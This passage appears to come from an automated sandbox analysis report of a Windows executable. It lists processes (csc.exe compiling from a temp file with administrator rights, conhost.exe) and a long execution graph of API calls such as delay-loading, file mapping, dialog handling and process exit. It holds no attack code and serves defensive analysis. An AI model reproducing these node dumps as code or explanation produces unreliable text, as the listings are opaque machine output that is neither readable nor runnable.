                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline"
                                                                                                                                                                                                  Imagebase:0x7ff6aea70000
                                                                                                                                                                                                  File size:2'759'232 bytes
                                                                                                                                                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:67
                                                                                                                                                                                                  Start time:17:02:29
                                                                                                                                                                                                  Start date:08/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:9.9%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                    Signature Coverage:10.1%
                                                                                                                                                                                                    Total number of Nodes:1531
                                                                                                                                                                                                    Total number of Limit Nodes:30
                                                                                                                                                                                                    execution_graph 25387 88c793 97 API calls 4 library calls 25424 88b18d 78 API calls 25425 889580 6 API calls 25449 88c793 102 API calls 4 library calls 25390 89b49d 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25465 88f3a0 27 API calls 25391 89a4a0 71 API calls _free 25394 88dca1 DialogBoxParamW 25395 8a08a0 IsProcessorFeaturePresent 25466 876faa 111 API calls 3 library calls 25427 88eda7 48 API calls _unexpected 25467 881bbd GetCPInfo IsDBCSLeadByte 25428 88b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 23446 88e5b1 23447 88e578 23446->23447 23449 88e85d 23447->23449 23475 88e5bb 23449->23475 23451 88e86d 23452 88e8ca 23451->23452 23460 88e8ee 23451->23460 23453 88e7fb DloadReleaseSectionWriteAccess 6 API calls 23452->23453 23454 88e8d5 RaiseException 23453->23454 23468 88eac3 23454->23468 23455 88e966 LoadLibraryExA 23457 88e979 GetLastError 23455->23457 23458 88e9c7 23455->23458 23456 88ea95 23484 88e7fb 23456->23484 23463 88e9a2 23457->23463 23471 88e98c 23457->23471 23461 88e9d9 23458->23461 23462 88e9d2 FreeLibrary 23458->23462 23459 88ea37 GetProcAddress 23459->23456 23465 88ea47 GetLastError 23459->23465 23460->23455 23460->23456 23460->23458 23460->23461 23461->23456 23461->23459 23462->23461 23464 88e7fb DloadReleaseSectionWriteAccess 6 API calls 23463->23464 23466 88e9ad RaiseException 23464->23466 23472 88ea5a 23465->23472 23466->23468 23468->23447 23469 88e7fb DloadReleaseSectionWriteAccess 6 API calls 23470 88ea7b RaiseException 23469->23470 23473 88e5bb ___delayLoadHelper2@8 6 API calls 23470->23473 23471->23458 23471->23463 23472->23456 23472->23469 23474 88ea92 23473->23474 23474->23456 23476 88e5ed 23475->23476 23477 88e5c7 23475->23477 23476->23451 23492 88e664 23477->23492 23479 88e5cc 23480 88e5e8 23479->23480 23495 88e78d 23479->23495 23500 88e5ee GetModuleHandleW GetProcAddress GetProcAddress 23480->23500 23483 88e836 23483->23451 23485 88e80d 23484->23485 23486 88e82f 23484->23486 23487 88e664 DloadReleaseSectionWriteAccess 3 API calls 23485->23487 23486->23468 23488 88e812 23487->23488 23489 88e82a 23488->23489 23490 88e78d DloadProtectSection 3 API calls 23488->23490 23503 88e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23489->23503 23490->23489 23501 88e5ee GetModuleHandleW GetProcAddress GetProcAddress 23492->23501 23494 88e669 23494->23479 23496 88e7a2 DloadProtectSection 23495->23496 23497 88e7dd VirtualProtect 23496->23497 23498 88e7a8 23496->23498 23502 88e6a3 VirtualQuery GetSystemInfo 23496->23502 23497->23498 23498->23480 23500->23483 23501->23494 23502->23497 23503->23486 23712 88f3b2 23713 88f3be __FrameHandler3::FrameUnwindToState 23712->23713 23744 88eed7 23713->23744 23715 88f3c5 23716 88f518 23715->23716 23719 88f3ef 23715->23719 23817 88f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 23716->23817 23718 88f51f 23810 897f58 23718->23810 23731 88f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23719->23731 23755 898aed 23719->23755 23726 88f40e 23728 88f48f 23763 88f953 GetStartupInfoW _abort 23728->23763 23730 88f495 23764 898a3e 51 API calls 23730->23764 23731->23728 23813 897af4 38 API calls 3 library calls 23731->23813 23734 88f49d 23765 88df1e 23734->23765 23738 88f4b1 23738->23718 23739 88f4b5 23738->23739 23740 88f4be 23739->23740 23815 897efb 28 API calls _abort 23739->23815 23816 88f048 12 API calls ___scrt_uninitialize_crt 23740->23816 23743 88f4c6 23743->23726 23745 88eee0 23744->23745 23819 88f654 IsProcessorFeaturePresent 23745->23819 23747 88eeec 23820 892a5e 23747->23820 23749 88eef1 23750 88eef5 23749->23750 23828 898977 23749->23828 23750->23715 23753 88ef0c 23753->23715 23757 898b04 23755->23757 23756 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23758 88f408 23756->23758 23757->23756 23758->23726 23759 898a91 23758->23759 23760 898ac0 23759->23760 23761 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23760->23761 23762 898ae9 23761->23762 23762->23731 23763->23730 23764->23734 23928 880863 23765->23928 23769 88df3d 23977 88ac16 23769->23977 23771 88df46 _abort 23772 88df59 GetCommandLineW 23771->23772 23773 88df68 23772->23773 23774 88dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23772->23774 23981 88c5c4 23773->23981 23992 874092 23774->23992 23780 88dfe0 23986 88dbde 23780->23986 23781 88df76 OpenFileMappingW 23783 88df8f MapViewOfFile 23781->23783 23784 88dfd6 CloseHandle 23781->23784 23787 88dfcd UnmapViewOfFile 23783->23787 23788 88dfa0 __InternalCxxFrameHandler 23783->23788 23784->23774 23787->23784 23792 88dbde 2 API calls 23788->23792 23794 88dfbc 23792->23794 23793 8890b7 8 API calls 23795 88e0aa DialogBoxParamW 23793->23795 23794->23787 23796 88e0e4 23795->23796 23797 88e0fd 23796->23797 23798 88e0f6 Sleep 23796->23798 23801 88e10b 23797->23801 24025 88ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 23797->24025 23798->23797 23800 88e12a DeleteObject 23802 88e13f DeleteObject 23800->23802 23803 88e146 23800->23803 23801->23800 23802->23803 23804 88e189 23803->23804 23805 88e177 23803->23805 24022 88ac7c 23804->24022 24026 88dc3b WaitForSingleObject 23805->24026 23809 88e1c3 23814 88f993 GetModuleHandleW 23809->23814 24282 897cd5 23810->24282 23813->23728 23814->23738 23815->23740 23816->23743 23817->23718 23819->23747 23832 893b07 23820->23832 23823 892a67 23823->23749 23825 892a6f 23826 892a7a 23825->23826 23846 893b43 DeleteCriticalSection 23825->23846 23826->23749 23875 89c05a 23828->23875 23831 892a7d 7 API calls 2 library calls 23831->23750 23833 893b10 23832->23833 23835 893b39 23833->23835 23836 892a63 23833->23836 23847 893d46 23833->23847 23852 893b43 DeleteCriticalSection 23835->23852 23836->23823 23838 892b8c 23836->23838 23868 893c57 23838->23868 23842 892baf 23843 892bbc 23842->23843 23874 892bbf 6 API calls ___vcrt_FlsFree 23842->23874 23843->23825 23845 892ba1 23845->23825 23846->23823 23853 893c0d 23847->23853 23850 893d7e InitializeCriticalSectionAndSpinCount 23851 893d69 23850->23851 23851->23833 23852->23836 23854 893c4f 23853->23854 23855 893c26 23853->23855 23854->23850 23854->23851 23855->23854 23860 893b72 23855->23860 23858 893c3b GetProcAddress 23858->23854 23859 893c49 23858->23859 23859->23854 23866 893b7e ___vcrt_FlsGetValue 23860->23866 23861 893bf3 23861->23854 23861->23858 23862 893b95 LoadLibraryExW 23863 893bfa 23862->23863 23864 893bb3 GetLastError 23862->23864 23863->23861 23865 893c02 FreeLibrary 23863->23865 23864->23866 23865->23861 23866->23861 23866->23862 23867 893bd5 LoadLibraryExW 23866->23867 23867->23863 23867->23866 23869 893c0d ___vcrt_FlsGetValue 5 API calls 23868->23869 23870 893c71 23869->23870 23871 893c8a TlsAlloc 23870->23871 23872 892b96 23870->23872 23872->23845 23873 893d08 6 API calls ___vcrt_FlsGetValue 23872->23873 23873->23842 23874->23845 23878 89c077 23875->23878 23879 89c073 23875->23879 23876 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23877 88eefe 23876->23877 23877->23753 23877->23831 23878->23879 23881 89a6a0 23878->23881 23879->23876 23882 89a6ac __FrameHandler3::FrameUnwindToState 23881->23882 23893 89ac31 EnterCriticalSection 23882->23893 23884 89a6b3 23894 89c528 23884->23894 23886 89a6c2 23887 89a6d1 23886->23887 23907 89a529 29 API calls 23886->23907 23909 89a6ed LeaveCriticalSection _abort 23887->23909 23890 89a6cc 23908 89a5df GetStdHandle GetFileType 23890->23908 23891 89a6e2 _abort 23891->23878 23893->23884 23895 89c534 __FrameHandler3::FrameUnwindToState 23894->23895 23896 89c558 23895->23896 23897 89c541 23895->23897 23910 89ac31 EnterCriticalSection 23896->23910 23918 8991a8 20 API calls __dosmaperr 23897->23918 23900 89c546 23919 899087 26 API calls __cftof 23900->23919 23902 89c590 23920 89c5b7 LeaveCriticalSection _abort 23902->23920 23903 89c550 _abort 23903->23886 23906 89c564 23906->23902 23911 89c479 23906->23911 23907->23890 23908->23887 23909->23891 23910->23906 23912 89b136 __dosmaperr 20 API calls 23911->23912 23913 89c48b 23912->23913 23917 89c498 23913->23917 23921 89af0a 23913->23921 23914 898dcc _free 20 API calls 23916 89c4ea 23914->23916 23916->23906 23917->23914 23918->23900 23919->23903 23920->23903 23922 89ac98 __dosmaperr 5 API calls 23921->23922 23923 89af31 23922->23923 23924 89af4f InitializeCriticalSectionAndSpinCount 23923->23924 23925 89af3a 23923->23925 23924->23925 23926 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23925->23926 23927 89af66 23926->23927 23927->23913 24032 88ec50 23928->24032 23931 880888 GetProcAddress 23934 8808b9 GetProcAddress 23931->23934 23935 8808a1 23931->23935 23932 8808e7 23933 880c14 GetModuleFileNameW 23932->23933 24043 8975fb 42 API calls 2 library calls 23932->24043 23940 880c32 23933->23940 23936 8808cb 23934->23936 23935->23934 23936->23932 23938 880b54 23938->23933 23939 880b5f GetModuleFileNameW CreateFileW 23938->23939 23941 880c08 CloseHandle 23939->23941 23942 880b8f SetFilePointer 23939->23942 23946 880c94 GetFileAttributesW 23940->23946 23948 880c5d CompareStringW 23940->23948 23949 880cac 23940->23949 24034 87b146 23940->24034 24037 88081b 23940->24037 23941->23933 23942->23941 23943 880b9d ReadFile 23942->23943 23943->23941 23950 880bbb 23943->23950 23946->23940 23946->23949 23947 88081b 2 API calls 23947->23950 23948->23940 23951 880cb7 23949->23951 23953 880cec 23949->23953 23950->23941 23950->23947 23954 880cd0 GetFileAttributesW 23951->23954 23956 880ce8 23951->23956 23952 880dfb 23976 88a64d GetCurrentDirectoryW 23952->23976 23953->23952 23955 87b146 GetVersionExW 23953->23955 23954->23951 23954->23956 23957 880d06 23955->23957 23956->23953 23958 880d0d 23957->23958 23959 880d73 23957->23959 23961 88081b 2 API calls 23958->23961 23960 874092 _swprintf 51 API calls 23959->23960 23962 880d9b AllocConsole 23960->23962 23963 880d17 23961->23963 23964 880da8 GetCurrentProcessId AttachConsole 23962->23964 23965 880df3 ExitProcess 23962->23965 23966 88081b 2 API calls 23963->23966 24048 893e13 23964->24048 23968 880d21 23966->23968 24044 87e617 23968->24044 23969 880dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23969->23965 23972 874092 _swprintf 51 API calls 23973 880d4f 23972->23973 23974 87e617 53 API calls 23973->23974 23975 880d5e 23974->23975 23975->23965 23976->23769 23978 88081b 2 API calls 23977->23978 23979 88ac2a OleInitialize 23978->23979 23980 88ac4d GdiplusStartup SHGetMalloc 23979->23980 23980->23771 23983 88c5ce 23981->23983 23982 88c6e4 23982->23780 23982->23781 23983->23982 23985 881fac CharUpperW 23983->23985 24073 87f3fa 82 API calls 2 library calls 23983->24073 23985->23983 23987 88ec50 23986->23987 23988 88dbeb SetEnvironmentVariableW 23987->23988 23990 88dc0e 23988->23990 23989 88dc36 23989->23774 23990->23989 23991 88dc2a SetEnvironmentVariableW 23990->23991 23991->23989 24074 874065 23992->24074 23995 88b6dd LoadBitmapW 23996 88b70b GetObjectW 23995->23996 23997 88b6fe 23995->23997 23998 88b71a 23996->23998 24108 88a6c2 FindResourceW 23997->24108 24103 88a5c6 23998->24103 24003 88b770 24014 87da42 24003->24014 24004 88b74c 24124 88a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24004->24124 24005 88a6c2 13 API calls 24007 88b73d 24005->24007 24007->24004 24009 88b743 DeleteObject 24007->24009 24008 88b754 24125 88a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24008->24125 24009->24004 24011 88b75d 24126 88a80c 8 API calls 24011->24126 24013 88b764 DeleteObject 24013->24003 24137 87da67 24014->24137 24019 8890b7 24270 88eb38 24019->24270 24023 88acab GdiplusShutdown CoUninitialize 24022->24023 24023->23809 24025->23801 24027 88dc56 24026->24027 24031 88dc9b CloseHandle 24026->24031 24028 88dc59 PeekMessageW 24027->24028 24029 88dc6b GetMessageW TranslateMessage DispatchMessageW 24028->24029 24030 88dc8c WaitForSingleObject 24028->24030 24029->24030 24030->24028 24030->24031 24031->23804 24033 88086d GetModuleHandleW 24032->24033 24033->23931 24033->23932 24035 87b15a GetVersionExW 24034->24035 24036 87b196 24034->24036 24035->24036 24036->23940 24038 88ec50 24037->24038 24039 880828 GetSystemDirectoryW 24038->24039 24040 88085e 24039->24040 24041 880840 24039->24041 24040->23940 24042 880851 LoadLibraryW 24041->24042 24042->24040 24043->23938 24045 87e627 24044->24045 24050 87e648 24045->24050 24049 893e1b 24048->24049 24049->23969 24049->24049 24056 87d9b0 24050->24056 24053 87e645 24053->23972 24054 87e66b LoadStringW 24054->24053 24055 87e682 LoadStringW 24054->24055 24055->24053 24061 87d8ec 24056->24061 24058 87d9cd 24059 87d9e2 24058->24059 24069 87d9f0 26 API calls 24058->24069 24059->24053 24059->24054 24062 87d904 24061->24062 24068 87d984 _strncpy 24061->24068 24064 87d928 24062->24064 24070 881da7 WideCharToMultiByte 24062->24070 24067 87d959 24064->24067 24071 87e5b1 50 API calls __vsnprintf 24064->24071 24072 896159 26 API calls 3 library calls 24067->24072 24068->24058 24069->24059 24070->24064 24071->24067 24072->24068 24073->23983 24075 87407c __vswprintf_c_l 24074->24075 24078 895fd4 24075->24078 24081 894097 24078->24081 24082 8940bf 24081->24082 24083 8940d7 24081->24083 24098 8991a8 20 API calls __dosmaperr 24082->24098 24083->24082 24085 8940df 24083->24085 24086 894636 __cftof 38 API calls 24085->24086 24088 8940ef 24086->24088 24087 8940c4 24099 899087 26 API calls __cftof 24087->24099 24100 894601 20 API calls 2 library calls 24088->24100 24091 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24093 874086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24091->24093 24092 894167 24101 8949e6 51 API calls 4 library calls 24092->24101 24093->23995 24096 894172 24102 8946b9 20 API calls _free 24096->24102 24097 8940cf 24097->24091 24098->24087 24099->24097 24100->24092 24101->24096 24102->24097 24127 88a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24103->24127 24105 88a5cd 24106 88a5d9 24105->24106 24128 88a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24105->24128 24106->24003 24106->24004 24106->24005 24109 88a7d3 24108->24109 24110 88a6e5 SizeofResource 24108->24110 24109->23996 24109->23998 24110->24109 24111 88a6fc LoadResource 24110->24111 24111->24109 24112 88a711 LockResource 24111->24112 24112->24109 24113 88a722 GlobalAlloc 24112->24113 24113->24109 24114 88a73d GlobalLock 24113->24114 24115 88a7cc GlobalFree 24114->24115 24116 88a74c __InternalCxxFrameHandler 24114->24116 24115->24109 24117 88a754 CreateStreamOnHGlobal 24116->24117 24118 88a76c 24117->24118 24119 88a7c5 GlobalUnlock 24117->24119 24129 88a626 GdipAlloc 24118->24129 24119->24115 24122 88a79a GdipCreateHBITMAPFromBitmap 24123 88a7b0 24122->24123 24123->24119 24124->24008 24125->24011 24126->24013 24127->24105 24128->24106 24130 88a638 24129->24130 24131 88a645 24129->24131 24133 88a3b9 24130->24133 24131->24119 24131->24122 24131->24123 24134 88a3da GdipCreateBitmapFromStreamICM 24133->24134 24135 88a3e1 GdipCreateBitmapFromStream 24133->24135 24136 88a3e6 24134->24136 24135->24136 24136->24131 24138 87da75 __EH_prolog 24137->24138 24139 87daa4 GetModuleFileNameW 24138->24139 24140 87dad5 24138->24140 24141 87dabe 24139->24141 24183 8798e0 24140->24183 24141->24140 24143 87db31 24194 896310 24143->24194 24145 87e261 78 API calls 24148 87db05 24145->24148 24148->24143 24148->24145 24161 87dd4a 24148->24161 24149 87db44 24150 896310 26 API calls 24149->24150 24158 87db56 ___vcrt_FlsGetValue 24150->24158 24151 87dc85 24151->24161 24230 879d70 81 API calls 24151->24230 24155 87dc9f ___std_exception_copy 24156 879bd0 82 API calls 24155->24156 24155->24161 24159 87dcc8 ___std_exception_copy 24156->24159 24158->24151 24158->24161 24208 879e80 24158->24208 24224 879bd0 24158->24224 24229 879d70 81 API calls 24158->24229 24159->24161 24178 87dcd3 _wcslen ___std_exception_copy ___vcrt_FlsGetValue 24159->24178 24231 881b84 MultiByteToWideChar 24159->24231 24217 87959a 24161->24217 24162 87e159 24167 87e1de 24162->24167 24237 898cce 26 API calls 2 library calls 24162->24237 24164 87e16e 24238 897625 26 API calls 2 library calls 24164->24238 24166 87e214 24172 896310 26 API calls 24166->24172 24167->24166 24171 87e261 78 API calls 24167->24171 24169 87e1c6 24239 87e27c 78 API calls 24169->24239 24171->24167 24173 87e22d 24172->24173 24174 896310 26 API calls 24173->24174 24174->24161 24176 881da7 WideCharToMultiByte 24176->24178 24178->24161 24178->24162 24178->24176 24232 87e5b1 50 API calls __vsnprintf 24178->24232 24233 896159 26 API calls 3 library calls 24178->24233 24234 898cce 26 API calls 2 library calls 24178->24234 24235 897625 26 API calls 2 library calls 24178->24235 24236 87e27c 78 API calls 24178->24236 24181 87e29e GetModuleHandleW FindResourceW 24182 87da55 24181->24182 24182->24019 24184 8798ea 24183->24184 24185 87994b CreateFileW 24184->24185 24186 87996c GetLastError 24185->24186 24188 8799bb 24185->24188 24240 87bb03 24186->24240 24190 8799ff 24188->24190 24192 8799e5 SetFileTime 24188->24192 24189 87998c 24189->24188 24191 879990 CreateFileW GetLastError 24189->24191 24190->24148 24191->24188 24193 8799b5 24191->24193 24192->24190 24193->24188 24195 896349 24194->24195 24196 89634d 24195->24196 24207 896375 24195->24207 24244 8991a8 20 API calls __dosmaperr 24196->24244 24198 896352 24245 899087 26 API calls __cftof 24198->24245 24199 896699 24201 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24199->24201 24203 8966a6 24201->24203 24202 89635d 24204 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24202->24204 24203->24149 24205 896369 24204->24205 24205->24149 24207->24199 24246 896230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24207->24246 24209 879e92 24208->24209 24210 879ea5 24208->24210 24211 879eb0 24209->24211 24247 876d5b 77 API calls 24209->24247 24210->24211 24212 879eb8 SetFilePointer 24210->24212 24211->24158 24212->24211 24214 879ed4 GetLastError 24212->24214 24214->24211 24215 879ede 24214->24215 24215->24211 24248 876d5b 77 API calls 24215->24248 24218 8795cf 24217->24218 24219 8795be 24217->24219 24218->24181 24219->24218 24220 8795d1 24219->24220 24221 8795ca 24219->24221 24254 879620 24220->24254 24249 87974e 24221->24249 24225 879bdc 24224->24225 24227 879be3 24224->24227 24225->24158 24227->24225 24228 879785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24227->24228 24269 876d1a 77 API calls 24227->24269 24228->24227 24229->24158 24230->24155 24231->24178 24232->24178 24233->24178 24234->24178 24235->24178 24236->24178 24237->24164 24238->24169 24239->24167 24241 87bb10 _wcslen 24240->24241 24242 87bbb8 GetCurrentDirectoryW 24241->24242 24243 87bb39 _wcslen 24241->24243 24242->24243 24243->24189 24244->24198 24245->24202 24246->24207 24247->24210 24248->24211 24250 879781 24249->24250 24253 879757 24249->24253 24250->24218 24253->24250 24260 87a1e0 24253->24260 24255 87962c 24254->24255 24257 87964a 24254->24257 24255->24257 24258 879638 CloseHandle 24255->24258 24256 879669 24256->24218 24257->24256 24268 876bd5 76 API calls 24257->24268 24258->24257 24261 88ec50 24260->24261 24262 87a1ed DeleteFileW 24261->24262 24263 87a200 24262->24263 24264 87977f 24262->24264 24265 87bb03 GetCurrentDirectoryW 24263->24265 24264->24218 24266 87a214 24265->24266 24266->24264 24267 87a218 DeleteFileW 24266->24267 24267->24264 24268->24256 24269->24227 24271 88eb3d ___std_exception_copy 24270->24271 24272 8890d6 24271->24272 24275 88eb59 24271->24275 24279 897a5e 7 API calls 2 library calls 24271->24279 24272->23793 24274 88f5c9 24281 89238d RaiseException 24274->24281 24275->24274 24280 89238d RaiseException 24275->24280 24277 88f5e6 24279->24271 24280->24274 24281->24277 24283 897ce1 _unexpected 24282->24283 24284 897ce8 24283->24284 24285 897cfa 24283->24285 24318 897e2f GetModuleHandleW 24284->24318 24306 89ac31 EnterCriticalSection 24285->24306 24288 897ced 24288->24285 24319 897e73 GetModuleHandleExW 24288->24319 24292 897d01 24302 897d9f 24292->24302 24304 897d76 24292->24304 24327 8987e0 20 API calls _abort 24292->24327 24294 897de8 24328 8a2390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24294->24328 24295 897dbc 24310 897dee 24295->24310 24296 898a91 _abort 5 API calls 24296->24302 24300 898a91 _abort 5 API calls 24301 897d8e 24300->24301 24301->24296 24307 897ddf 24302->24307 24304->24300 24304->24301 24306->24292 24329 89ac81 LeaveCriticalSection 24307->24329 24309 897db8 24309->24294 24309->24295 24330 89b076 24310->24330 24313 897e1c 24316 897e73 _abort 8 API calls 24313->24316 24314 897dfc GetPEB 24314->24313 24315 897e0c GetCurrentProcess TerminateProcess 24314->24315 24315->24313 24317 897e24 ExitProcess 24316->24317 24318->24288 24320 897e9d GetProcAddress 24319->24320 24321 897ec0 24319->24321 24324 897eb2 24320->24324 24322 897ecf 24321->24322 24323 897ec6 FreeLibrary 24321->24323 24325 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24322->24325 24323->24322 24324->24321 24326 897cf9 24325->24326 24326->24285 24327->24304 24329->24309 24331 89b09b 24330->24331 24335 89b091 24330->24335 24332 89ac98 __dosmaperr 5 API calls 24331->24332 24332->24335 24333 88fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24334 897df8 24333->24334 24334->24313 24334->24314 24335->24333 25450 8862ca 124 API calls __InternalCxxFrameHandler 25430 88b5c0 100 API calls 25470 8877c0 119 API calls 25471 88ffc0 RaiseException _com_raise_error _com_error::_com_error 24342 88dec2 24343 88decf 24342->24343 24344 87e617 53 API calls 24343->24344 24345 88dedc 24344->24345 24346 874092 _swprintf 51 API calls 24345->24346 24347 88def1 SetDlgItemTextW 24346->24347 24350 88b568 PeekMessageW 24347->24350 24351 88b5bc 24350->24351 24352 88b583 GetMessageW 24350->24352 24353 88b5a8 TranslateMessage DispatchMessageW 24352->24353 24354 88b599 IsDialogMessageW 24352->24354 24353->24351 24354->24351 24354->24353 24448 8710d5 24453 875abd 24448->24453 24454 875ac7 __EH_prolog 24453->24454 24460 87b505 24454->24460 24456 875ad3 24466 875cac GetCurrentProcess GetProcessAffinityMask 24456->24466 24461 87b50f __EH_prolog 24460->24461 24467 87f1d0 82 API calls 24461->24467 24463 87b521 24468 87b61e 24463->24468 24467->24463 24469 87b630 _abort 24468->24469 24472 8810dc 24469->24472 24475 88109e GetCurrentProcess GetProcessAffinityMask 24472->24475 24476 87b597 24475->24476 24476->24456 25452 890ada 51 API calls 2 library calls 24481 88e1d1 14 API calls ___delayLoadHelper2@8 25472 89a3d0 21 API calls 2 library calls 25473 8a2bd0 VariantClear 25398 88f4d3 20 API calls 24483 88e2d7 24484 88e1db 24483->24484 24485 88e85d ___delayLoadHelper2@8 14 API calls 24484->24485 24485->24484 24491 8713e1 84 API calls 2 library calls 24493 88b7e0 24494 88b7ea __EH_prolog 24493->24494 24663 871316 24494->24663 24497 88b82a 24500 88b838 24497->24500 24501 88b89b 24497->24501 24574 88b841 24497->24574 24498 88bf0f 24728 88d69e 24498->24728 24504 88b878 24500->24504 24505 88b83c 24500->24505 24503 88b92e GetDlgItemTextW 24501->24503 24508 88b8b1 24501->24508 24503->24504 24511 88b96b 24503->24511 24516 88b95f EndDialog 24504->24516 24504->24574 24514 87e617 53 API calls 24505->24514 24505->24574 24506 88bf38 24509 88bf41 SendDlgItemMessageW 24506->24509 24510 88bf52 GetDlgItem SendMessageW 24506->24510 24507 88bf2a SendMessageW 24507->24506 24513 87e617 53 API calls 24508->24513 24509->24510 24746 88a64d GetCurrentDirectoryW 24510->24746 24512 88b980 GetDlgItem 24511->24512 24661 88b974 24511->24661 24517 88b994 SendMessageW SendMessageW 24512->24517 24518 88b9b7 SetFocus 24512->24518 24519 88b8ce SetDlgItemTextW 24513->24519 24520 88b85b 24514->24520 24516->24574 24517->24518 24522 88b9c7 24518->24522 24536 88b9e0 24518->24536 24523 88b8d9 24519->24523 24768 87124f SHGetMalloc 24520->24768 24521 88bf82 GetDlgItem 24525 88bf9f 24521->24525 24526 88bfa5 SetWindowTextW 24521->24526 24527 87e617 53 API calls 24522->24527 24530 88b8e6 GetMessageW 24523->24530 24523->24574 24525->24526 24747 88abab GetClassNameW 24526->24747 24531 88b9d1 24527->24531 24528 88be55 24532 87e617 53 API calls 24528->24532 24534 88b8fd IsDialogMessageW 24530->24534 24530->24574 24769 88d4d4 24531->24769 24537 88be65 SetDlgItemTextW 24532->24537 24534->24523 24540 88b90c TranslateMessage DispatchMessageW 24534->24540 24543 87e617 53 API calls 24536->24543 24541 88be79 24537->24541 24538 88c1fc SetDlgItemTextW 24538->24574 24540->24523 24544 87e617 53 API calls 24541->24544 24546 88ba17 24543->24546 24580 88be9c _wcslen 24544->24580 24545 88bff0 24549 88c020 24545->24549 24553 87e617 53 API calls 24545->24553 24547 874092 _swprintf 51 API calls 24546->24547 24552 88ba29 24547->24552 24548 88c73f 97 API calls 24548->24545 24560 88c73f 97 API calls 24549->24560 24566 88c0d8 24549->24566 24550 88b9d9 24673 87a0b1 24550->24673 24556 88d4d4 16 API calls 24552->24556 24557 88c003 SetDlgItemTextW 24553->24557 24555 88c18b 24561 88c19d 24555->24561 24562 88c194 EnableWindow 24555->24562 24556->24550 24563 87e617 53 API calls 24557->24563 24558 88ba68 GetLastError 24559 88ba73 24558->24559 24679 88ac04 SetCurrentDirectoryW 24559->24679 24565 88c03b 24560->24565 24567 88c1ba 24561->24567 24787 8712d3 GetDlgItem EnableWindow 24561->24787 24562->24561 24568 88c017 SetDlgItemTextW 24563->24568 24577 88c04d 24565->24577 24601 88c072 24565->24601 24566->24555 24597 88c169 24566->24597 24610 87e617 53 API calls 24566->24610 24573 88c1e1 24567->24573 24586 88c1d9 SendMessageW 24567->24586 24568->24549 24569 87e617 53 API calls 24569->24574 24570 88ba87 24575 88ba90 GetLastError 24570->24575 24576 88ba9e 24570->24576 24571 88c0cb 24581 88c73f 97 API calls 24571->24581 24573->24574 24587 87e617 53 API calls 24573->24587 24575->24576 24582 88bb20 24576->24582 24588 88baae GetTickCount 24576->24588 24637 88bb11 24576->24637 24785 889ed5 32 API calls 24577->24785 24579 88c1b0 24788 8712d3 GetDlgItem EnableWindow 24579->24788 24589 87e617 53 API calls 24580->24589 24611 88beed 24580->24611 24581->24566 24590 88bcfb 24582->24590 24591 88bb39 GetModuleFileNameW 24582->24591 24592 88bcf1 24582->24592 24583 88bd56 24688 8712f1 GetDlgItem ShowWindow 24583->24688 24584 88c066 24584->24601 24586->24573 24594 88b862 24587->24594 24595 874092 _swprintf 51 API calls 24588->24595 24596 88bed0 24589->24596 24600 87e617 53 API calls 24590->24600 24779 87f28c 82 API calls 24591->24779 24592->24504 24592->24590 24594->24538 24594->24574 24603 88bac7 24595->24603 24604 874092 _swprintf 51 API calls 24596->24604 24786 889ed5 32 API calls 24597->24786 24607 88bd05 24600->24607 24601->24571 24608 88c73f 97 API calls 24601->24608 24602 88bd66 24689 8712f1 GetDlgItem ShowWindow 24602->24689 24680 87966e 24603->24680 24604->24611 24605 88c188 24605->24555 24606 88bb5f 24612 874092 _swprintf 51 API calls 24606->24612 24613 874092 